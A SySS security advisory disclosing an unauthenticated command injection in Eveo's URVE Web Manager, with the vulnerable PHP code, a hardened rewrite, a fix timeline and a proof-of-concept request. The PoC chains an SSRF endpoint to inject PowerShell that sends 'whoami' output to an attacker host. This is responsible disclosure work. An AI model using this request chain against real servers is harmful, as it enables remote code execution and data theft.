Advisory ID: SYSS-2025-034
Product: URVE Web Manager
Manufacturer: Eveo
Affected Version(s): 27.02.2025
Tested Version(s): 27.02.2025
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2025-04-09
Solution Date: 2025-06-02
Public Disclosure: 2025-07-17
CVE Reference: CVE-2025-36846
Author of Advisory: Stefan Krause, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
The URVE Web Manager is the administrative web application for the URVE
Smart Office suite by Eveo. This suite includes tools such as a room booking
application and a desk sharing application.
The manufacturer describes the Smart Office product as follows (see [1]):
"Smart Office is a system of modern applications and user interfaces that
support office management, hybrid work model and teamwork."
Due to the exposure of several back-end endpoints to unauthenticated users,
the application is vulnerable to unauthenticated remote code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The application exposes an endpoint to unauthenticated users that contains
an OS command injection. The endpoint takes an input parameter that is
passed directly into the PHP function shell_exec().
In the tested version, the endpoint was restricted to requests originating
from localhost.
This endpoint can be requested at /_internal/pc/vpro.php.
The code can be seen below:
error_reporting(0);
// Source check: only the client address is inspected, no authentication
if(!in_array($_SERVER['REMOTE_ADDR'], ['127.0.0.1', '::1', 'localhost']))
die('error');
[REDACTED]
// Request parameters are concatenated into the command line unescaped
$cmd = "powershell.exe $software_path -computerName $ip -operation $operation -username $usr -password $pass";
//var_dump($cmd);
// The resulting string is handed to the system shell
$data = shell_exec($cmd);
//var_dump($data);
//echo("Wake remote PC: $mac $ip $mask $port");
echo("vPro request sent.");
?>
The localhost restriction can be circumvented by using another exposed
endpoint.
The endpoint /_internal/redirect.php exposes a server-side request forgery
(SSRF), as described in SYSS-2025-035 [3].
This SSRF can be used to send a request to the vpro.php endpoint from the
server itself, so that the request arrives with a localhost source address.
Both endpoints are accessible without authentication. Therefore, this
security vulnerability can be exploited without any valid credentials.
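As an added example (not the vendor's code or patch), the following is a hardened form of the vpro.php fragment quoted above. It assumes the parameters arrive via $_GET as the PoC request shows, that $software_path is a fixed server-side script path, and that the application provides a session-based authentication helper, named here hypothetically require_admin_session(); the operation names in the allowlist are placeholders.

```php
<?php
// Added example, not the vendor's patch. Two separate defects are addressed:
// (1) REMOTE_ADDR is used as an authentication boundary, which the SSRF in
//     redirect.php defeats; (2) request parameters reach the shell unescaped.

// (1) Require a real authenticated session instead of trusting the source IP.
require_admin_session();            // hypothetical helper of the application

// (2a) Allowlist the operation rather than passing arbitrary text through.
$allowed_ops = ['poweron', 'poweroff', 'reset'];   // placeholder names
$operation = $_GET['operation'] ?? '';
if (!in_array($operation, $allowed_ops, true)) {
    http_response_code(400);
    die('invalid operation');
}

// (2b) Accept only a syntactically valid IP address as the target host.
$ip = filter_var($_GET['ip'] ?? '', FILTER_VALIDATE_IP);
if ($ip === false) {
    http_response_code(400);
    die('invalid ip');
}

$usr  = $_GET['usr']  ?? '';
$pass = $_GET['pass'] ?? '';

// (2c) Quote every value. escapeshellarg() prevents ';', '&', '|' and similar
// metacharacters from terminating the command. Caveat: on Windows it replaces
// '%' and '!' with spaces, so credentials containing those characters would be
// mangled; reject them up front rather than silently altering them.
foreach ([$usr, $pass] as $secret) {
    if (strpbrk($secret, '%!') !== false) {
        http_response_code(400);
        die('unsupported character in credentials');
    }
}

// -File makes PowerShell treat the remaining arguments as script parameters,
// whereas powershell.exe with a bare first argument runs it as -Command and
// would re-parse the values as PowerShell code.
$cmd = 'powershell.exe -NonInteractive -File ' . escapeshellarg($software_path)
     . ' -computerName ' . escapeshellarg($ip)
     . ' -operation '    . escapeshellarg($operation)
     . ' -username '     . escapeshellarg($usr)
     . ' -password '     . escapeshellarg($pass);

$data = shell_exec($cmd);
echo("vPro request sent.");
?>
```

The authentication check is the essential part: even with perfect escaping, an endpoint that triggers PowerShell on behalf of any caller that can reach 127.0.0.1 remains reachable through the SSRF.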
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The PoC code uses a combination of both endpoints to perform remote code
execution. In the example, PowerShell is used to execute the command
"whoami" on the target machine and send the result to the attacker system
via an HTTP request.
All content between the <@burp_urlencode> and <@/burp_urlencode> markers
has to be URL-encoded.
The PoC is left unencoded for better readability.
GET /_internal/redirect.php?url=<@burp_urlencode>https://127.0.0.1:444/_internal/pc/vpro.php?mac=0&ip=0&operation=0&usr=0&pass=0%3bpowershell.exe+-c+<@burp_urlencode>'$user = (whoami); $url = ''http:///''+$user; (New-Object System.Net.WebClient).DownloadFile($url,''test.txt'')'<@/burp_urlencode><@/burp_urlencode> HTTP/1.1
Host: :
Connection: keep-alive
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Block all endpoints under /_internal/ from external requests.
Update to the latest version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2025-04-01: Vulnerability discovered
2025-04-09: Vulnerability reported to manufacturer
2025-06-02: Patch released by manufacturer
2025-07-17: Public disclosure of vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for URVE Smart Office
https://smartoffice.expert/en/
[2] SySS Security Advisory SYSS-2025-034
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-034.txt
[3] SySS Security Advisory SYSS-2025-035
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Stefan Krause of SySS GmbH.
E-Mail: stefan.krause@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Krause.asc
Key ID: 0x2B2BA6FDD6E172F3
PGP-Fingerprint: 88C8 13B9 FA6A 2FE6 B6D8 7226 2B2B A6FD D6E1 72F3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en